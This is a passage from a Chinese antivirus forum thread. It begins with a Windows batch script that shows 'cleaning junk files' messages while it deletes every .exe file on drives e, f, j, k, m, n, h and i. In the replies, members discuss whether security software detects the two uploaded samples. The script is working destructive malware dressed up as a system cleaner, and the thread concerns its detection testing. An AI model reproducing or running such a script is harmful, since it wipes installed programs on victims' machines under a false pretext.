del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
cls & echo 清理垃圾完成,正在清理系统 垃圾 文件...请稍等...
ping 127.0.0.1 -n "3">NUL
  for %%a in (e f j k m n h i) do (
    cd /d %%a:\
    for /r %%b in (*.exe) do (
      del /s /q %%b
    )
)
cls & echo 已完成...
ping 127.0.0.1 -n "3">NUL
exit

::GAGATOSHUT团队[/mw_shl_code]
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 13:59:10 | 显示全部楼层
欧阳宣 发表于 2015-1-27 13:57
[mw_shl_code=html,true]@echo off & color 0d
echo 是否清空计算机系统垃圾?
pause>nul & cls & echo 正 ...

大家测试的时候要说明一下
你使用的什么安全软件【我上传了样本两个】这两个版本都会拦截?还是只拦截其中一个?还是都没有反应?
请大家务必说清楚!

欧阳宣
头像被屏蔽
发表于 2015-1-27 14:01:05 | 显示全部楼层
离开你的世界 发表于 2015-1-27 13:59
大家测试的时候要说明一下
你使用的什么安全软件【我上传了样本两个】这两个版本都会拦截?还是只拦截其 ...

谁说我要测试了?

我只是把批处理放上来了而已,无论哪个都很有充分的理由不拦截。
paul_guo
发表于 2015-1-27 14:01:24 | 显示全部楼层
欧阳宣 发表于 2015-1-27 13:57
[mw_shl_code=html,true]@echo off & color 0d
echo 是否清空计算机系统垃圾?
pause>nul & cls & echo 正 ...

我这里上报迷之失效,回复我说解压失败,你上报下?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 23:12 , Processed in 0.139292 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表